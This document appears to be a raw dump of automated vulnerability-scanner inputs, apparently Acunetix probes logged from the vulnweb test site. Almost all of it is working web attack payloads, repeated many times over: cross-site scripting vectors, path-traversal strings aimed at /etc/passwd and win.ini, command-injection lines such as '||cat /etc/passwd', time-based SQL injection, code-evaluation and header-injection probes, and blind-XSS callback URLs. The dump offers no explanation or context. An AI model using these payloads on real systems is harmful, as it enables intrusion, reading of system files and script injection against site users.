1<video><source onerror="javascript:prompt(979213)">

"|"ld

testasp.vulnweb.com

1

H2bhDyYG')

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(904399)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

5EiQ7sW7'))

1<div style=width:expression(prompt(952497))>

1

'"()

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1<iframe src='data:text/html

1

1

1

-1

/etc/passwd

WEB-INF/web.xml

1

1

1<body onload=prompt(964749)>

"

1

1

-1)

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(917673)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

||cat /etc/passwd

-1))

1

1

'

1<img src=xyz OnErRor=prompt(912240)>

1

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<img/src=">" onerror=alert(915565)>

p9kN8ki9'

1

http://hitcgYi7Gp1Iv.bxss.me/

"

&dir

1

comments

1<ScRiPt%20>prompt(994233)</sCripT>

ZHE1Jk00')

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

YEa4RUHJ'))

1&lt

1

comments

1

1

1

1

\xf6<img acu onmouseover=prompt(933118) //\xf6>

"&dir&"

comments/.

1

file:///etc/passwd

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<input autofocus onfocus=prompt(919245)>

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

http://www.acunetix.tst

1

<a href='http://www.acunetix.com'>website security</a>

1

1

'"

1

'|dir

WEB-INF/web.xml

1

[url=http://www.acunetix.com]website security[/url]

<!--

1

1

1

1

1

WEB-INF\web.xml

1_ZjgB7 <ScRiPt >prompt(937400)</ScRiPt>

"|dir

1

response.write(9791041*9089963)

1'"()&%<ScRiPt >prompt(904298)</ScRiPt>

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

'"()&%<ScRiPt >prompt(958135)</ScRiPt>

'+response.write(9791041*9089963)+'

&cat /etc/passwd&

1

../../../../../../../../../../boot.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9791041*9089963)+"

1_942444

1

'&cat /etc/passwd&'

1

1

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

1

................windowswin.ini

1

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

acu6564\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6564

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

acux6721\xc0\xbez1\xc0\xbcz2a\x90bcxuca6721

|cat /etc/passwd#

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

${100031+99755}

1

-1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt >prompt(953042)</ScRiPt>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n949167=v927985

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

-1)

"|"ld

)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<script>prompt(997981)</script>

1some_inexistent_file_with_long_name%00.jpg

-1))

!(()&&!|*|*|

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt >prompt(959033)</ScRiPt>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

YoJV2p8M'

^(#$!@#$)(()))******

1

1

1

/etc/passwd

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917220></ScRiPt>

testasp.vulnweb.com

'

KulrmFFF')

1

1

'"()

1

1<ScRiPt >prompt(961012)</ScRiPt>

1

WEB-INF/web.xml

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

RDlTkuLF'))

1

1

1

1

1<video><source onerror="javascript:prompt(924464)">

1

1

-1

WEB-INF\web.xml

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977686)"></g></svg>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

1

1

'

1<div style=width:expression(prompt(947605))>

-1))

1

1

1

1

'&dir&'

1

1

1<iframe src='data:text/html

fY1DkXEa'

http://hitDymUzUOvXo.bxss.me/

"

acunetix_wvs_invalid_filename

QKebVCju')

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1<body onload=prompt(930406)>

"&dir&"

1

file:///etc/passwd

comments

xE4l7Q0W'))

${@print(md5(acunetix_wvs_security_test))}\

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990831)>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

comments

|dir

1

1

1

1

1<img src=xyz OnErRor=prompt(905513)>

1

1

comments/.

'|dir

WEB-INF/web.xml

1

1

'"

http://www.acunetix.tst

1

1<img/src=">" onerror=alert(901089)>

1

1

1

WEB-INF\web.xml

"|dir

<!--

1

1<ScRiPt%20>prompt(909143)</sCripT>

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1

1

1

1

1&lt

1

../../../../../../../../../../boot.ini

1

1

1'"()&%<ScRiPt >prompt(916811)</ScRiPt>

1

1

response.write(9486530*9978915)

\xf6<img acu onmouseover=prompt(929102) //\xf6>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

&cat /etc/passwd&

1

'"()&%<ScRiPt >prompt(999410)</ScRiPt>

'+response.write(9486530*9978915)+'

1<input autofocus onfocus=prompt(928961)>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

"+response.write(9486530*9978915)+"

<a href='http://www.acunetix.com'>website security</a>

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1_965212

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

................windowswin.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1_z4DLh <ScRiPt >prompt(919830)</ScRiPt>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

cat /etc/passwd

1

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

1

1

acu9024\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9024

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

|cat /etc/passwd#

1

-1

1

acux8683\xc0\xbez1\xc0\xbcz2a\x90bcxuca8683

${100110+99614}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'|'ld

-1)

1

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt >prompt(961968)</ScRiPt>

1&n917038=v933750

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<script>prompt(905828)</script>

1

"|"ld

1

1

!(()&&!|*|*|

1<ScRiPt >prompt(956259)</ScRiPt>

nLw2NZXz'

testasp.vulnweb.com

WEB-INF/web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

22CfVvJ4')

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936822></ScRiPt>

^(#$!@#$)(()))******

1

1

WEB-INF\web.xml

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt >prompt(980998)</ScRiPt>

1

LYl4TBIU'))

'

1

'"()

1

1

-1

1<video><source onerror="javascript:prompt(925060)">

1

/etc/passwd

1

1

"

1

1

-1)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903418)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1))

1

1

||cat /etc/passwd

1

1<div style=width:expression(prompt(971111))>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

4nTqfqqE'

1

FBT4fL6x')

1

1

acunetix_wvs_invalid_filename

'

1<iframe src='data:text/html

&dir

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

23fYcOo2'))

"

http://hitWCLTcmL7it.bxss.me/

comments

1

1<body onload=prompt(905480)>

'&dir&'

1

1

${@print(md5(acunetix_wvs_security_test))}

1

comments

1

"&dir&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929752)>

${@print(md5(acunetix_wvs_security_test))}\

1

file:///etc/passwd

1

comments/.

1

1

1

1<img src=xyz OnErRor=prompt(902527)>

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1<img/src=">" onerror=alert(969118)>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'|dir

http://www.acunetix.tst

1<ScRiPt%20>prompt(916692)</sCripT>

WEB-INF/web.xml

1

1

"|dir

1

1

1&lt

WEB-INF\web.xml

1

1

1

1

1

1

1

\xf6<img acu onmouseover=prompt(911481) //\xf6>

../../../../../../../../../../windows/win.ini

1

1

1

'"

1

1

1

1<input autofocus onfocus=prompt(991303)>

response.write(9281247*9606693)

1

1

1'"()&%<ScRiPt >prompt(983514)</ScRiPt>

<!--

../../../../../../../../../../boot.ini

1

<a href='http://www.acunetix.com'>website security</a>

1

1

'+response.write(9281247*9606693)+'

1

&cat /etc/passwd&

'"()&%<ScRiPt >prompt(926481)</ScRiPt>

1

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../windows/win.ini.jpg

1

"+response.write(9281247*9606693)+"

1

1

'&cat /etc/passwd&'

1_946594

1_BzztY <ScRiPt >prompt(996551)</ScRiPt>

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

................windowswin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1

`cat /etc/passwd`

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

${99156+99996}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

acu5208\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5208

if(now()=sysdate(),sleep(7.092),0)/*'XOR(if(now()=sysdate(),sleep(7.092),0))OR'"XOR(if(now()=sysdate(),sleep(7.092),0))OR"*/

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

|cat /etc/passwd#

1

acux6278\xc0\xbez1\xc0\xbcz2a\x90bcxuca6278

(select(0)from(select(sleep(7.092)))v)/*'+(select(0)from(select(sleep(7.092)))v)+'"+(select(0)from(select(sleep(7.092)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n929898=v991877

'|'ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(913672)</ScRiPt>

)

-1

1

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1)

1<script>prompt(993104)</script>

"|"ld

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1))

1<ScRiPt >prompt(921119)</ScRiPt>

^(#$!@#$)(()))******

testasp.vulnweb.com

WEB-INF/web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1

bCYlSqHa'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?964212></ScRiPt>

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

WEB-INF\web.xml

'

9NOJiVeX')

1<ScRiPt >prompt(993473)</ScRiPt>

1

1

1

1

1

/etc/passwd

1<video><source onerror="javascript:prompt(981081)">

"

1

1

tPCE27fQ'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933905)"></g></svg>

'

||cat /etc/passwd

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

"

1

1<div style=width:expression(prompt(963880))>

-1)

1

http://hitaYYlIXOK7p.bxss.me/

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<iframe src='data:text/html

-1))

${@print(md5(acunetix_wvs_security_test))}

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

acunetix_wvs_invalid_filename

1

1

1

lSWi10tR'

1<body onload=prompt(972832)>

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

"&dir&"

1

nCw1k6aI')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(914926)>

1

comments

1

1

|dir

file:///etc/passwd

1

ncmEgedn'))

1<img src=xyz OnErRor=prompt(948937)>

http://www.acunetix.tst

comments/.

1

1

'|dir

1<img/src=">" onerror=alert(954043)>

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1<ScRiPt%20>prompt(983847)</sCripT>

'"

1

1

"|dir

1

1

1

WEB-INF/web.xml

1&lt

<!--

1

1

1

\xf6<img acu onmouseover=prompt(947106) //\xf6>

1'"()&%<ScRiPt >prompt(906895)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

1

1

'"()&%<ScRiPt >prompt(970044)</ScRiPt>

response.write(9803288*9868374)

1<input autofocus onfocus=prompt(966949)>

1

../../../../../../../../../../windows/win.ini

1

1

1

'+response.write(9803288*9868374)+'

1

&cat /etc/passwd&

<a href='http://www.acunetix.com'>website security</a>

1_902831

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../boot.ini

"+response.write(9803288*9868374)+"

'&cat /etc/passwd&'

1

[url=http://www.acunetix.com]website security[/url]

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../windows/win.ini.jpg

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1_3pWbX <ScRiPt >prompt(969976)</ScRiPt>

1

1

1

cat /etc/passwd

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu6192\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6192

1

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

................windowswin.ini

`cat /etc/passwd`

1

1

1

1

1

1

acux8642\xc0\xbez1\xc0\xbcz2a\x90bcxuca8642

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

|cat /etc/passwd#

1

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd

-1

1

1<ScRiPt >prompt(904230)</ScRiPt>

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99760+100450}

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

'|'ld

-1)

1<script>prompt(907726)</script>

1

1

1

1

1

-1))

"|"ld

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(936410)</ScRiPt>

../../../../../../../../../../etc/passwd.jpg

)

1

1&n987200=v924048

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

nqOSH0C9'

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900272></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

!(()&&!|*|*|

1

1

1some_inexistent_file_with_long_name%00.jpg

MCJrDaj0')

1

1<ScRiPt >prompt(997986)</ScRiPt>

^(#$!@#$)(()))******

'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

CoAf2Czw'))

1

1

1<video><source onerror="javascript:prompt(946374)">

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"

-1

testasp.vulnweb.com

WEB-INF/web.xml

'"()

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(995812)"></g></svg>

1

-1)

WEB-INF\web.xml

||cat /etc/passwd

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

1

1<div style=width:expression(prompt(932419))>

-1))

/etc/passwd

1

&dir

1

1

1

P43X3CCz'

1

1<iframe src='data:text/html

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'&dir&'

'

1

6NGsVzW2')

1<body onload=prompt(995521)>

1

1

1

1

"&dir&"

1

ElfJC0sO'))

http://hitGAxhvyneRL.bxss.me/

"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911451)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<img src=xyz OnErRor=prompt(929743)>

${@print(md5(acunetix_wvs_security_test))}

1

|dir

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

1<img/src=">" onerror=alert(914703)>

${@print(md5(acunetix_wvs_security_test))}\

1

1

'|dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1<ScRiPt%20>prompt(997347)</sCripT>

1

1

1

comments

"|dir

1

http://www.acunetix.tst

1

1&lt

1

file:///etc/passwd

1

comments/.

\xf6<img acu onmouseover=prompt(905193) //\xf6>

1

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1<input autofocus onfocus=prompt(911974)>

1'"()&%<ScRiPt >prompt(925498)</ScRiPt>

<!--

1

1

1

'"()&%<ScRiPt >prompt(963530)</ScRiPt>

1

1

WEB-INF/web.xml

1

<a href='http://www.acunetix.com'>website security</a>

1

response.write(9860615*9560780)

1

1

1

1_977039

1

[url=http://www.acunetix.com]website security[/url]

WEB-INF\web.xml

1

1

'+response.write(9860615*9560780)+'

&cat /etc/passwd&

1

1

1_jbjRL <ScRiPt >prompt(996932)</ScRiPt>

1

1

"+response.write(9860615*9560780)+"

../../../../../../../../../../windows/win.ini

1

1

1

1

'&cat /etc/passwd&'

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

../../../../../../../../../../boot.ini

acu1516\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1516

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1

cat /etc/passwd

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux4852\xc0\xbez1\xc0\xbcz2a\x90bcxuca4852

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99107+99919}

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(999434)</ScRiPt>

1

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1

'|'ld

................windowswin.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<script>prompt(909437)</script>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n940186=v911151

1

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

..\..\..\..\..\..\..\..\windows\win.ini

1

-1

1

1<ScRiPt >prompt(993475)</ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

-1)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995265></ScRiPt>

!(()&&!|*|*|

1

testasp.vulnweb.com

1

'

/../..//../..//../..//../..//../..//etc/passwd.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

-1))

'"()

1<ScRiPt >prompt(945787)</ScRiPt>

^(#$!@#$)(()))******

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(955904)">

XU02nsMG'

"

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951325)"></g></svg>

1

9wdtGF5N')

1

1

1

||cat /etc/passwd

1

1<div style=width:expression(prompt(924530))>

tckB43x1'))

1

WEB-INF/web.xml

1

/etc/passwd

&dir

1

-1

1<iframe src='data:text/html

1

'&dir&'

1

WEB-INF\web.xml

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

1<body onload=prompt(967768)>

"&dir&"

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

acunetix_wvs_invalid_filename

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979992)>

|dir

${@print(md5(acunetix_wvs_security_test))}

-1))

http://hit4yuMGShRK3.bxss.me/

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

1<img src=xyz OnErRor=prompt(954055)>

1

'|dir

Yt04oqFq'

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

comments

1<img/src=">" onerror=alert(926384)>

ejUVFS86')

1

1

1

"|dir

1

1

1<ScRiPt%20>prompt(981208)</sCripT>

file:///etc/passwd

comments/.

aDwH4cLG'))

1

1

1

1

1&lt

/\../\../\../\../\../\../\../etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

\xf6<img acu onmouseover=prompt(985992) //\xf6>

1

http://www.acunetix.tst

1

WEB-INF/web.xml

1

1

1

1

1

1<input autofocus onfocus=prompt(959650)>

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(927116)</ScRiPt>

'"

1

1

response.write(9826675*9085277)

1

<a href='http://www.acunetix.com'>website security</a>

'"()&%<ScRiPt >prompt(936894)</ScRiPt>

<!--

../../../../../../../../../../windows/win.ini

1

1

1

1

1

'+response.write(9826675*9085277)+'

1_960363

[url=http://www.acunetix.com]website security[/url]

1

../../../../../../../../../../boot.ini

1

1

1

"+response.write(9826675*9085277)+"

1_DeTSr <ScRiPt >prompt(963428)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

&cat /etc/passwd&

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

................windowswin.ini

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

acu6777\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6777

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

|cat /etc/passwd#

acux5852\xc0\xbez1\xc0\xbcz2a\x90bcxuca5852

${99529+99318}

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt >prompt(982822)</ScRiPt>

1

1

'|'ld

1

1

1<script>prompt(908618)</script>

